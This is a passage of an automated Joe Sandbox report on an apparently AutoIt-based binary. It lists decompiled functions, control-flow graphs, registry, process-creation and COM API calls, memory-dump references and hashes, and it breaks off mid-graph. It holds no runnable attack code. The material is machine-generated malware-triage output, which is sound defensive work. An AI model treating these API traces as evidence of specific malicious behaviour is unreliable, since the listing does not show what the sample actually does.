                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0013EABE
                                                                                                                                                            • Part of subcall function 0013EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0013EADA,?,?), ref: 0013EB27
                                                                                                                                                          • _wcscat.LIBCMT ref: 001932FC
                                                                                                                                                          • _wcscat.LIBCMT ref: 00193334
                                                                                                                                                          • _wcsncpy.LIBCMT ref: 00193370
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                          • String ID: Include$\
                                                                                                                                                          • API String ID: 1213536620-3429789819
                                                                                                                                                          • Opcode ID: 324c5af4c6416bde9b335ae1d9e72f53d63cf4cd415eb4645b27b696fdfde321
                                                                                                                                                          • Instruction ID: ebfa4c8ff1bae6c10391760090b699b018147cc274aa0df0c60f9045dfe3eb2b
                                                                                                                                                          • Opcode Fuzzy Hash: 324c5af4c6416bde9b335ae1d9e72f53d63cf4cd415eb4645b27b696fdfde321
                                                                                                                                                          • Instruction Fuzzy Hash: D1519DB2404380ABC305EF95ECE5C9AB7ECFB5D300B80092EF5459B661EB749684CF66
                                                                                                                                                          Function 0018352A Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1008 18352a-183569 call 12d3d2 * 3 1015 18356b-18356e 1008->1015 1016 183574-1835e7 call 1284a6 call 183d7b call 183af7 1008->1016 1015->1016 1017 1835f9-18360d call 132570 1015->1017 1030 1835e9-1835f4 call 16d7e4 1016->1030 1031 183612-183617 1016->1031 1023 183a94-183ab7 call 125cd3 * 3 1017->1023 1030->1017 1032 183619-18362e RegConnectRegistryW 1031->1032 1033 18366d 1031->1033 1036 183630-183662 call 127ba9 call 16d7e4 call 132570 1032->1036 1037 183667-18366b 1032->1037 1039 183671-18369c RegCreateKeyExW 1033->1039 1036->1023 1037->1039 1042 18369e-1836d2 call 127ba9 call 16d7e4 call 132570 1039->1042 1043 1836e7-1836ec 1039->1043 1042->1023 1067 1836d8-1836e2 1042->1067 1046 183a7b-183a8c 1043->1046 1047 1836f2-183715 call 1284a6 call 141bc7 1043->1047 1046->1023 1055 183a8e 1046->1055 1063 183796-1837b6 call 1284a6 call 141bc7 1047->1063 1064 183717-18376d call 1284a6 call 1418fb call 1284a6 * 2 1047->1064 1055->1023 1075 1837bc-183814 call 1284a6 call 1418fb call 1284a6 * 2 RegSetValueExW 1063->1075 1076 183840-183860 call 1284a6 call 141bc7 1063->1076 1064->1046 1096 183773-183791 call 127ba9 call 132570 1064->1096 1067->1023 1075->1046 1107 18381a-18383b call 127ba9 call 132570 1075->1107 1089 183949-183969 call 1284a6 call 141bc7 1076->1089 1090 183866-1838c9 call 1284a6 call 14010a call 1284a6 call 123b1e 1076->1090 1109 18396b-18398b call 12cdb4 call 1284a6 1089->1109 1110 1839c6-1839e6 call 1284a6 call 141bc7 1089->1110 1127 1838e9-183918 call 1284a6 1090->1127 1128 1838cb-1838d0 1090->1128 1118 183a74 1096->1118 1107->1046 1136 18398d-1839a1 1109->1136 1134 1839e8-183a0e call 12d00b call 1284a6 1110->1134 1135 183a13-183a30 call 1284a6 call 141bc7 1110->1135 1118->1046 1151 18391a-183936 call 127ba9 call 132570 1127->1151 1152 18393d-183944 call 14017e 1127->1152 1131 1838d8-1838db 1128->1131 1132 1838d2-1838d4 1128->1132 1131->1128 1137 1838dd-1838df 1131->1137 1132->1131 1134->1136 1156 183a32-183a60 call 16be47 call 1284a6 call 16be8a 1135->1156 1157 183a67-183a71 call 132570 1135->1157 1136->1046 1148 1839a7-1839c1 call 127ba9 call 132570 1136->1148 1137->1127 1142 1838e1-1838e5 1137->1142 1142->1127 1148->1118 1151->1152 1152->1046 1156->1157 1157->1118
                                                                                                                                                          APIs
                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00183626
                                                                                                                                                          • RegCreateKeyExW.KERNEL32(?,?,00000000,001BDBF0,00000000,?,00000000,?,?), ref: 00183694
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConnectCreateRegistry
                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                          • API String ID: 4192528855-966354055
                                                                                                                                                          • Opcode ID: f2ea38265b837c285221b0ffe9fbf74cc028a44cb55a4bac4be63ad42e8be951
                                                                                                                                                          • Instruction ID: 981ea8a635a80c6e1e1b600383e4cbc6846e43e82fc28f9e58bd454e353b44c1
                                                                                                                                                          • Opcode Fuzzy Hash: f2ea38265b837c285221b0ffe9fbf74cc028a44cb55a4bac4be63ad42e8be951
                                                                                                                                                          • Instruction Fuzzy Hash: E0027B752006119FCB14EF28D991E2AB7E5FF99720F04845DF89A9B3A2DB30EE51CB41
                                                                                                                                                          Function 001230A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 001230B0
                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001230BF
                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 001230D5
                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 001230E7
                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 001230F9
                                                                                                                                                            • Part of subcall function 0012318A: LoadImageW.USER32(00120000,00000063,00000001,00000010,00000010,00000000), ref: 001231AE
                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00123167
                                                                                                                                                            • Part of subcall function 00122F58: GetSysColorBrush.USER32(0000000F), ref: 00122F8B
                                                                                                                                                            • Part of subcall function 00122F58: RegisterClassExW.USER32(00000030), ref: 00122FB5
                                                                                                                                                            • Part of subcall function 00122F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00122FC6
                                                                                                                                                            • Part of subcall function 00122F58: LoadIconW.USER32(000000A9), ref: 00123009
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                          • API String ID: 2880975755-4155596026
                                                                                                                                                          • Opcode ID: 05a0f3b92c5bb7400439d5c85f23843992736b699dd0d9837daf0af9789ad7c5
                                                                                                                                                          • Instruction ID: 7864c38c1583f34a9239ea421134a5e5ac3d3f62f9c83cfe9933cc51d7325a94
                                                                                                                                                          • Opcode Fuzzy Hash: 05a0f3b92c5bb7400439d5c85f23843992736b699dd0d9837daf0af9789ad7c5
                                                                                                                                                          • Instruction Fuzzy Hash: 77213CB4E00354BBDB04DFE9EC89A9DBBF5FB48314F00412AE615ABAA0D77545D08F91
                                                                                                                                                          Function 0017B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1237 17b74b-17b7ac VariantInit call 12ca8e CoInitialize 1240 17b7b4-17b7c7 call 13d5f6 1237->1240 1241 17b7ae CoUninitialize 1237->1241 1244 17b7d5-17b7dc 1240->1244 1245 17b7c9-17b7d0 call 12ca8e 1240->1245 1241->1240 1247 17b7de-17b805 call 1284a6 call 15a857 1244->1247 1248 17b81b-17b85b call 1284a6 call 13f885 1244->1248 1245->1244 1247->1248 1259 17b807-17b816 call 17c235 1247->1259 1257 17b9d3-17ba17 SetErrorMode CoGetInstanceFromFile 1248->1257 1258 17b861-17b86e 1248->1258 1262 17ba1f-17ba3a CoGetObject 1257->1262 1263 17ba19-17ba1d 1257->1263 1260 17b870-17b881 call 13d5f6 1258->1260 1261 17b8a8-17b8b6 GetRunningObjectTable 1258->1261 1276 17bad0-17bae3 VariantClear 1259->1276 1279 17b883-17b88d call 12cdb4 1260->1279 1280 17b8a0 1260->1280 1270 17b8d5-17b8e8 call 17c235 1261->1270 1271 17b8b8-17b8c9 1261->1271 1267 17bab5-17bac5 call 17c235 SetErrorMode 1262->1267 1268 17ba3c 1262->1268 1266 17ba40-17ba47 SetErrorMode 1263->1266 1275 17ba4b-17ba51 1266->1275 1286 17bac7-17bacb call 125cd3 1267->1286 1268->1266 1270->1286 1284 17b8ed-17b8fc 1271->1284 1285 17b8cb-17b8d0 1271->1285 1282 17ba53-17ba55 1275->1282 1283 17baa8-17baab 1275->1283 1279->1280 1296 17b88f-17b89e call 12cdb4 1279->1296 1280->1261 1288 17ba57-17ba78 call 15ac4b 1282->1288 1289 17ba8d-17baa6 call 16a6f6 1282->1289 1283->1267 1295 17b907-17b91b 1284->1295 1285->1270 1286->1276 1288->1289 1298 17ba7a-17ba83 1288->1298 1289->1286 1303 17b921-17b925 1295->1303 1304 17b9bb-17b9d1 1295->1304 1296->1261 1298->1289 1303->1304 1305 17b92b-17b940 1303->1305 1304->1275 1309 17b9a2-17b9ac 1305->1309 1310 17b942-17b957 1305->1310 1309->1295 1310->1309 1313 17b959-17b983 call 15ac4b 1310->1313 1317 17b985-17b98d 1313->1317 1318 17b994-17b99e 1313->1318 1319 17b9b1-17b9b6 1317->1319 1320 17b98f-17b990 1317->1320 1318->1309 1319->1304 1320->1318
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017B777
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0017B7A4
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0017B7AE
                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0017B8AE
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0017B9DB
                                                                                                                                                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0017BA0F
                                                                                                                                                          • CoGetObject.OLE32(?,00000000,001AD91C,?), ref: 0017BA32
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 0017BA45
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0017BAC5
                                                                                                                                                          • VariantClear.OLEAUT32(001AD91C), ref: 0017BAD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2395222682-0
                                                                                                                                                          • Opcode ID: 761b12c2249203f13db1d2d4ef8f392443bfac2c2f55ae4d23ff520fb15f1432
                                                                                                                                                          • Instruction ID: ca0390ae0860964264553964f3fa65839ee0ced540715f8c5be083e0b825f401
                                                                                                                                                          • Opcode Fuzzy Hash: 761b12c2249203f13db1d2d4ef8f392443bfac2c2f55ae4d23ff520fb15f1432
                                                                                                                                                          • Instruction Fuzzy Hash: 29C114716083059FC704EF68C884A6BB7F9BF89308F00895DF59A9B251DB71ED45CB92
                                                                                                                                                          Function 00122F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00122F8B
                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00122FB5
                                                                                                                                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00122FC6
                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 00123009
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                          • API String ID: 975902462-1005189915
                                                                                                                                                          • Opcode ID: 639759bd4ef750f83f15235c5611b00a4eb6aee66f3fa4a3a42cdf55ed5ff252
                                                                                                                                                          • Instruction ID: 56c314da63169f01d4f39ad8da6ce285cb2b46463d3bdc227bcf6956083ec517
                                                                                                                                                          • Opcode Fuzzy Hash: 639759bd4ef750f83f15235c5611b00a4eb6aee66f3fa4a3a42cdf55ed5ff252
                                                                                                                                                          • Instruction Fuzzy Hash: DA21C4B5900358AFDB00DFE4E989BCEBBF4FB09704F00451AF616AAAA0D7B44584CF91
                                                                                                                                                          Function 001823C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1326 1823c5-182426 call 141970 1329 182428-18243b call 12cdb4 1326->1329 1330 182452-182456 1326->1330 1338 182488 1329->1338 1339 18243d-182450 call 12cdb4 1329->1339 1332 182458-182468 call 12cdb4 1330->1332 1333 18249d-1824a3 1330->1333 1345 18246b-182484 call 12cdb4 1332->1345 1335 1824b8-1824be 1333->1335 1336 1824a5-1824a8 1333->1336 1341 1824c8-1824e2 call 1284a6 call 123bcf 1335->1341 1342 1824c0 1335->1342 1340 1824ab-1824b0 call 12cdb4 1336->1340 1346 18248b-18248f 1338->1346 1339->1345 1340->1335 1359 1824e8-182541 call 1284a6 call 123bcf call 1284a6 call 123bcf call 1284a6 call 123bcf 1341->1359 1360 1825a1-1825a9 1341->1360 1342->1341 1345->1333 1358 182486 1345->1358 1351 182499-18249b 1346->1351 1352 182491-182497 1346->1352 1351->1333 1351->1335 1352->1340 1358->1346 1405 18256f-18259f GetSystemDirectoryW call 14010a GetSystemDirectoryW 1359->1405 1406 182543-18255e call 1284a6 call 123bcf 1359->1406 1362 1825ab-1825c6 call 1284a6 call 123bcf 1360->1362 1363 1825d3-182601 GetCurrentDirectoryW call 14010a GetCurrentDirectoryW 1360->1363 1362->1363 1376 1825c8-1825d1 call 1418fb 1362->1376 1372 182605 1363->1372 1375 182609-18260d 1372->1375 1378 18263e-18264e call 169a8f 1375->1378 1379 18260f-182639 call 12ca8e * 3 1375->1379 1376->1363 1376->1378 1388 1826aa 1378->1388 1389 182650-18269b call 16a17a call 16a073 call 16a102 1378->1389 1379->1378 1393 1826ac-1826bb 1388->1393 1389->1393 1424 18269d-1826a8 1389->1424 1397 18274c-182768 CreateProcessW 1393->1397 1398 1826c1-1826f1 call 15bc90 call 1418fb 1393->1398 1402 18276b-18277e call 14017e * 2 1397->1402 1420 1826fa-18270a call 1418fb 1398->1420 1421 1826f3-1826f8 1398->1421 1427 1827bd-1827c9 CloseHandle 1402->1427 1428 182780-1827b8 call 16d7e4 GetLastError call 127ba9 call 132570 1402->1428 1405->1372 1406->1405 1432 182560-182569 call 1418fb 1406->1432 1435 18270c-182711 1420->1435 1436 182713-182723 call 1418fb 1420->1436 1421->1420 1421->1421 1424->1393 1429 1827cb-1827f0 call 169d09 call 16a37f call 182881 1427->1429 1430 1827f5-1827f9 1427->1430 1443 18283e-18284f call 169b29 1428->1443 1429->1430 1437 1827fb-182805 1430->1437 1438 182807-182811 1430->1438 1432->1375 1432->1405 1435->1435 1435->1436 1454 18272c-18274a call 14017e * 3 1436->1454 1455 182725-18272a 1436->1455 1437->1443 1445 182819-182838 call 132570 CloseHandle 1438->1445 1446 182813 1438->1446 1445->1443 1446->1445 1454->1402 1455->1454 1455->1455
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 001823E6
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00182579
                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0018259D
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001825DD
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001825FF
                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00182760
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00182792
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 001827C1
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00182838
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4090791747-0
                                                                                                                                                          • Opcode ID: c9bb968c3ea1663556e101458a64b04f87d6797cf0dc76bb289ec61ff93f310f
                                                                                                                                                          • Instruction ID: 86d6ac5b3f3dd7f89edca65f5c75bd7048be1a7a93e35d443d78550abf72185e
                                                                                                                                                          • Opcode Fuzzy Hash: c9bb968c3ea1663556e101458a64b04f87d6797cf0dc76bb289ec61ff93f310f
                                                                                                                                                          • Instruction Fuzzy Hash: D0D1AF31604301DFCB16EF24D891B6ABBE1AF99310F14846DF9999B2A2DB31ED41CF52
                                                                                                                                                          Function 0017C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1467 17c8b7-17c8f1 1468 17c8f7-17c8fa 1467->1468 1469 17ccfb-17ccff 1467->1469 1468->1469 1470 17c900-17c903 1468->1470 1471 17cd04-17cd05 1469->1471 1470->1469 1472 17c909-17c912 call 17cff8 1470->1472 1473 17cd06 call 17c235 1471->1473 1478 17c925-17c92e call 16be14 1472->1478 1479 17c914-17c920 1472->1479 1477 17cd0b-17cd0f 1473->1477 1482 17c934-17c93a 1478->1482 1483 17cc61-17cc6c call 12d2c0 1478->1483 1479->1473 1484 17c940 1482->1484 1485 17c93c-17c93e 1482->1485 1489 17cc6e-17cc72 1483->1489 1490 17cca9-17ccb4 call 12d2c0 1483->1490 1488 17c942-17c94a 1484->1488 1485->1488 1491 17c950-17c967 call 15abf3 1488->1491 1492 17ccec-17ccf4 1488->1492 1494 17cc74-17cc76 1489->1494 1495 17cc78 1489->1495 1490->1492 1503 17ccb6-17ccba 1490->1503 1500 17c973-17c97f 1491->1500 1501 17c969-17c96e 1491->1501 1492->1469 1498 17cc7a-17cc98 call 13d6b4 call 1697b6 1494->1498 1495->1498 1521 17cc99-17cca7 call 16d7e4 1498->1521 1506 17c981-17c98d 1500->1506 1507 17c9ce-17c9f9 call 13fa89 1500->1507 1501->1471 1504 17ccc0 1503->1504 1505 17ccbc-17ccbe 1503->1505 1509 17ccc2-17ccea call 13d6b4 call 16503c call 132570 1504->1509 1505->1509 1506->1507 1510 17c98f-17c99c call 15a8c8 1506->1510 1517 17c9fb-17ca16 call 13ac65 1507->1517 1518 17ca18-17ca1a 1507->1518 1509->1521 1520 17c9a1-17c9a6 1510->1520 1523 17ca1d-17ca24 1517->1523 1518->1523 1520->1507 1525 17c9a8-17c9af 1520->1525 1521->1477 1528 17ca26-17ca30 1523->1528 1529 17ca52-17ca59 1523->1529 1531 17c9b1-17c9b8 1525->1531 1532 17c9be-17c9c5 1525->1532 1534 17ca32-17ca48 call 15a25b 1528->1534 1537 17cadf-17caec 1529->1537 1538 17ca5f-17ca66 1529->1538 1531->1532 1536 17c9ba 1531->1536 1532->1507 1539 17c9c7 1532->1539 1549 17ca4a-17ca50 1534->1549 1536->1532 1540 17caee-17caf8 1537->1540 1541 17cafb-17cb28 VariantInit call 141970 1537->1541 1538->1537 1544 17ca68-17ca7b 1538->1544 1539->1507 1540->1541 1553 17cb2d-17cb30 1541->1553 1554 17cb2a-17cb2b 1541->1554 1547 17ca7c-17ca84 1544->1547 1550 17ca86-17caa3 VariantClear 1547->1550 1551 17cad1-17cada 1547->1551 1549->1529 1555 17caa5-17cab9 SysAllocString 1550->1555 1556 17cabc-17cacc 1550->1556 1551->1547 1552 17cadc 1551->1552 1552->1537 1558 